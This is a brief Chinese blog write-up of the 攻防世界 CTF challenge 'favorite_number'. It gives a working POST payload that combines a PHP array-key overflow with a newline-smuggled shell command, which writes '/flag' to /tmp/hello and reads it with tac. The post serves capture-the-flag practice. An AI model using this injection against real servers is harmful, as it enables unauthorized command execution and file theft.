当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- ffmpeg编译后找不到libx264
- MySQL索引
- Mini Program Graduation Works WeChat Gymnasium Reservation Mini Program Graduation Design Finished Product (8) Graduation Design Thesis Template
- MYSQL下载及安装完整教程
- 小程序毕设作品之微信体育馆预约小程序毕业设计成品(6)开题答辩PPT
- Flink Learning 9: Configure the idea to develop the flink-Scala program environment
- npm install 时,卡住不动,五种解决方法
- golang学习之七:并发编程基础(goroutine、channel、select)
- 启航
- golang 计算器实现
猜你喜欢
Pytest学习笔记
npm install 报错问题解决合集
0725-面试记录
npm install 编译时报“Cannot read properties of null (reading ‘pickAlgorithm‘)“
oracle 和mysql 语句结果不一致问题
小程序毕设作品之微信体育馆预约小程序毕业设计成品(6)开题答辩PPT
Google Earth Engine APP—— 一个不用写代码可以直接下载相应区域的1984-2021年的GIF遥感影像动态图
SQL语句基础
再获权威认证!马上消费安逸花APP通过中国信通院“金融APP人脸识别安全能力评测”
Navicat 连接Oracle时提示oracle library is not loaded的问题解决
随机推荐
golang源码分析(3):thrift
实时数仓架构演进及选型
What is the difference between erp system and wms system
Cpolar application example of data acquisition equipment
全面认识二极管,一篇文章就够了
潮玩的“第二春”,在哪?
Gartner发布,年度Challenger!
npm install 编译时报“Cannot read properties of null (reading ‘pickAlgorithm‘)“
一些与开发者体验有关的话题
Mysql——字符串函数
Wechat Gymnasium Appointment Mini Program Graduation Design Finished Work (5) Task Book
ES: WeakSet
Nacos interview questions
Nacos配置中心工作原理(超简单)
ffmpeg编译后找不到libx264
究极异常处理逻辑——多层次异常的处理顺序
MySQL表的约束
NoSQL之redis缓存雪崩、穿透、击穿概念解决办法
安全至上:落地DevSecOps最佳实践你不得不知道的工具
2022高压电工特种作业证考试题库及答案